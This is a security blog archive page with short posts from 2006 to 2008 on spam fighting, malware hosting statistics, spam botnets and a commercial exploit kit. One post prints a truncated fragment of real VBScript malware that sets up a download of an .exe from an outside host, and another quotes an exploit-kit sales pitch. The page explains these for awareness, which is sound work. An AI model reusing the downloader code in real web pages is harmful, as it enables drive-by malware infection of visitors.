Of Spam & Men


Saturday 26 January 2008

Google as an RBL

From SecuriTeam:

For those not familiar with RBL, the term means Real-time Blackhole List; it is mainly used for SPAM fighting. I have recently started playing around with Google as an RBL engine; the idea is that if the search term I use returns too many hits, it is likely to be SPAM.

This is actually interesting. I've been googling URLs found in spam for a little while now; those kinds of searches never return tons of pages, but they do return a few, and most of the time they are security-related sites. This "Google RBL" could be pretty useful coupled with a list of trusted security sites. If the search returns a few URLs from those sites, then the mail is likely to be spam or malware related. What about a mail with "http://securityfocus.com" in the body? Uh-huh... definitely not bulletproof! So better stick to the IP of the sender and just count the number of hits returned by Google.

From SecuriTeam

Thursday 16 August 2007

Web Server Software and Malware

From Google Online Security Blog:

"In this post we investigate the distribution of web server software to provide insight into how server software is correlated to servers hosting malware binaries or engaging in drive-by-downloads."

Their numbers are slightly different from Netcraft's, but they give a fairly good explanation for it. According to Google, IIS and Apache share the same percentage of the overall malware-distributing web servers.

Interesting facts: in the US, 80% of malware is served by Apache; in China, 95% by IIS...

From Google Online Security Blog

Monday 23 July 2007

Chat^WTroll with malware authors

CastleCops.com is a popular site aiming at providing information that assists computer security education. Their forums are particularly useful when you think something fishy is going on. A lot of very well-informed people participate.

Recently a conversation about rogue domains used by the (nasty) Zlob malware was posted, and the malware author came and tried to explain that his little creation wasn't malware and that they weren't doing anything bad. No need to tell you the discussion literally went kaboom.

via The SpywareGuide Greynets Blog

Monday 7 May 2007

harvesting using adblock

Or The Amish Virus through Adwords

Didier Stevens conducted a little experiment: what if he used AdWords and told people to visit his blog to get infected by malware? His ad said "Is your PC virus-free? Get it infected here!" and it ran for 6 months. Of course clicking on the link would not infect the visitor's computer, but it could have. Guess how many people clicked? 409.

409 people wanted their computer infected? Well, I guess people don't read. How many people use Google to surf, thinking that AdWords ads are actually results given by Google?

Saturday 10 March 2007

virus watch: warezov domains

Warezov, SpamThru... viruses used by spammers. They are pretty easy to detect if you can monitor HTTP connections. Indeed, more and more viruses try to fetch data (spam templates or updates) from dedicated domains. If you can monitor those domains, you can detect infected computers on your network.

Continue reading...

Monday 5 February 2007

Online System Security Scanners

Claus Valca posted a long list of online scanners:

  • Primarily virus/trojan related online scanners
  • Single-File Upload Scanners
  • Malware (spyware/adware/etc.) Online Scanners
  • Online "single-file" Multi-Scan Test Websites
  • Software or System Security Vulnerability Scanners
  • Not Quite "Fully-Online" Based Software or System Security Vulnerability Scanners

Continue reading...

Thursday 18 January 2007

68 Gigabytes

68 Gigabytes is the amount of email addresses F-Secure downloaded from a server used by the Medbot spam virus.

Machines infected with Medbot use a client-server architecture. They connect to a central server to get further instructions as well as spam content and address lists. Then they get to the work of actually sending the spam.

The server addresses keep changing. Last week seek21.zootseek.com was used to serve e-mail addresses to the bots. While investigating the case last week, we downloaded some 68 Gigabytes of e-mail addresses from this

Continue reading...

Friday 12 January 2007

Disposable Email Services

A good way to prevent your main email address from being spammed is not to use it when creating web accounts or subscribing to websites. Managing different email accounts isn't trivial, and dropping a free account when it starts being spammed only to open another one the next minute isn't really useful either.

What you really need is a temporary email address you can use to prove you're not a robot, one you can throw away as soon as you have used it. That's what disposable email services are for.

Continue reading...

Friday 1 December 2006

Malware against virtual keyboards

More and more banking institutions are replacing the usual username/password form with a virtual keyboard. The sole purpose of this method is to defeat keyloggers.

Unfortunately for them, more and more malware also defeats the purpose of using virtual keyboards. The guys at VirusTotal analyzed a new trojan that performs a series of small screen captures of the area around the mouse cursor. It also adds a red arrow pointing exactly where the user clicked.

Continue reading...

Thursday 23 November 2006

Malware 2.0: Malware utilizes AJAX to install itself

Well, OK, it's not really AJAX. This malware uses an HTML snippet with XMLHttpRequest to fetch and download the actual executable. Add some minor obfuscation to fool antiviruses and you get W32/new-malware!Maximus on your hard drive:

[script language="VBScript"]
on error resume next

' due to how ajax works, the file MUST be within the same local domain
dl = "http://grupo-arroba.by.ru/grupo.exe"

' create adodbstream object
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
Set x = df.CreateObject(str,"")

Continue reading...

Sunday 19 November 2006

Web-Attacker Exposed

Websense analyzes Web-Attacker, the most popular toolkit for building malicious sites. It's supposedly used by one third of the malicious sites discovered:

Dear Friends! We would like to offer you multi-component exploit Web-Attacker, that realizes vulnerabilities in the internet browsers Internet Explorer and Mozilla Firefox. With the help of this exploit you will be able to install any programs on the local disks of visitors of your web pages. In the foundation of work of the exploit Web-Attacker, there are 7 already-known vulnerabilities in the internet browsers.

Objective of the Exploit: Hidden drop of the executable from the deleted source to the local hard drive of the site visitor.

It costs $300 and provides a few files to help you build your own malicious site. Just provide malware, a keylogger or whatever you want to infect your visitors with.

Continue reading...